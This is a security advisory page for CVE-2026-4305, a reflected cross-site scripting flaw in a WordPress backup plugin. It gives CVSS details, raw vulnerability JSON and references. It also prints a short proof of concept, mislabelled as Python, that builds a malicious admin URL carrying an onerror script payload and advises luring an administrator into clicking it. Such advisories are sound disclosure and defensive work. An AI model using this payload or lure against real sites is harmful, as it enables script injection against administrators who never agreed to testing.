Security Vulnerability Report
中文
CVE-2026-4305 CVSS 6.1 MEDIUM

CVE-2026-4305

Published: 2026-04-10 02:16:03
Last Modified: 2026-04-24 18:01:59
Source: [email protected]

Description

The Royal WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpr_pending_template' parameter in all versions up to, and including, 1.0.16 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Royal WordPress Backup & Restore Plugin <= 1.0.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-4305 Vulnerable Parameter: wpr_pending_template Affected Product: Royal WordPress Backup & Restore Plugin <= 1.0.16 Usage: Send the crafted URL to an administrator and induce a click. --> <html> <body> <script> // Construct the malicious payload var payload = '<img src=x onerror=alert(1)>'; // Encode the payload for the URL var encodedPayload = encodeURIComponent(payload); // Craft the vulnerable endpoint URL (Example path, actual path may vary based on plugin implementation) // The vulnerability is triggered via the wpr_pending_template parameter var targetUrl = 'http://example.com/wp-admin/admin.php?page=royal-backup-reset&wpr_pending_template=' + encodedPayload; // Log the PoC link console.log('PoC Link: ' + targetUrl); // Redirect for demonstration (Do not execute in production) // window.location.href = targetUrl; document.write('PoC Generated. Check console for URL: ' + targetUrl); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4305", "sourceIdentifier": "[email protected]", "published": "2026-04-10T02:16:03.397", "lastModified": "2026-04-24T18:01:58.517", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Royal WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpr_pending_template' parameter in all versions up to, and including, 1.0.16 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/royal-backup-reset/tags/1.0.16/assets/backup-reminder.js#L751", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/royal-backup-reset/tags/1.0.16/royal-backup-reset.php#L803", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Froyal-backup-reset/tags/1.0.16&new_path=%2Froyal-backup-reset/tags/1.0.17", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e0c658-b37c-4780-9589-6def9e36539b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.